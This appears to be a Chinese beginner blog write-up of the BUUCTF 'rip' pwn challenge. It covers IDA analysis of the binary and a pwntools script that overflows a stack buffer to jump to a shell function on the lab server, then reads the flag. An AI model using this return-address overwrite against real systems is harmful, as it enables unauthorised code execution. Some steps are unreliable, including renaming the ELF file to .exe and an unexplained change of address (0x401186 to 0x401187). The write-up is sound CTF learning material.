网址
BUUCTF在线评测
https://buuoj.cn/challenges#rip打开,如图所示
提示:先别启动靶机,靶机可以最后在启动,先分析下载的附件pwn1。
点击下载,下载完成之后,该文件后缀类型改为exe(就是将pwn1重命名为pwn1.exe)然后拖到IDA64.exe中。(我不知道后缀类型到底要不要改,网上很多教程都没讲清楚,然后我看了一下ida能打开的文件基本上都是exe的,我就自己改了)
注意:做pwn题目基本都要用到IDA跟虚拟机(Linux),所以要提前装好。
ida有很多版本,找一个能用的就行
ida及其相关资源网址(尽量找一些绿色网址下载)
IDA Pro入门指南:静态反编译神器的安装与使用详解-CSDN博客https://blog.csdn.net/qq_47403671/article/details/119939585逆向工具——IDA Pro的使用,从零基础到精通,收藏这篇就够了!_ida pro使用教程-CSDN博客https://blog.csdn.net/Python_0011/article/details/146866529IDA Pro 9.0 (macOS, Linux, Windows) - 强大的反汇编程序、反编译器和多功能调试器 - sysin - 博客园https://www.cnblogs.com/sysin/p/18639073我安装的是下面这个
[IDA] 加密与解密-ida的下载及详细安装过程(附有下载文件)_ida下载-CSDN博客https://blog.csdn.net/2301_77946674/article/details/141942756拖到ida64.exe中后有一些选项,默认就行了
打开后差不多是这样(我这里已经做完了,不知道怎么恢复原状)
如果不是这样的,双击左侧Functions window下的main,就变成这样了,再按F5(有些好像是F12),总之一定要出现一下界面
再双击变量S,就是第六行的括号中的S,出现以下界面就可以了
注意到右边两个蓝色S,观察到S左边由0变到F,一共是十六位,不管有什么用,先记下来。
双击左侧fun,得到以下界面(注意看栏目)
如果是以下界面,请按F5(或其他)
拖动分界线,记录fun函数内存地址0x401186
最后编写exp(我不会,借鉴别人的)
# 导入 pwntools 模块
from pwn import *# 和靶机进行连接
r = remote("node4.buuoj.cn",26817)#这里双引号里面的替换成自己所启动靶机的,端口26817一样替换为自己靶机的# 定义fun函数的内存地址
fun_addr = 0x401187# 定义payload,一共需要十六进制f(16)个字节数据a,需要8个十进制字节数据(b),这些都是垃圾数据
# 最后加上p64函数转换的fun函数的地址
payload = (b"a" * 0xf) + (b"b" * 8) + p64(fun_addr)# 发送payload
r.sendline(payload)# 获取靶机交互式终端
r.interactive()
最后使用python运行,建议在虚拟机上操作。Windows上应该也可以
python 1.py #这里1.py替换成自己编写的python文件我实在Ubuntu虚拟机上操作的,如图所示
输入ls(Linux ls(英文全拼: list directory contents)命令用于显示指定工作目录下之内容(列出目前工作目录所含的文件及子目录)。)
观察到特殊文件(或文件夹)flag,再次输入cat flag ,结果如图所示
得出flag
只不过我的虚拟机好像有点问题,在虚拟机中复制,却在主机上粘贴不了,害得我只能一个个敲出来。
注意
cat(英文全拼:concatenate)命令用于连接文件并打印到标准输出设备上,它的主要作用是用于查看和连接文件
其他,有需求请看以下网址内容
参考网址
BUUCTF-pwn-rip(第一个栈溢出) - Junglezt - 博客园https://www.cnblogs.com/Junglezt/p/17871927.htmlBUUCTF (PWN) RIP详细分析_buuctf rip pwn 解法-CSDN博客https://blog.csdn.net/qy201706/article/details/105397766buuctf rip 详细wp - refrain-again - 博客园https://www.cnblogs.com/refrain-again/p/15001283.htmlpwn学习(3)BUUCTF-rip - 技术栈https://jishuzhan.net/article/1704828218214715393
)
)
 视频教程 - 微博评论IP地图可视化分析实现)
详解)
)
)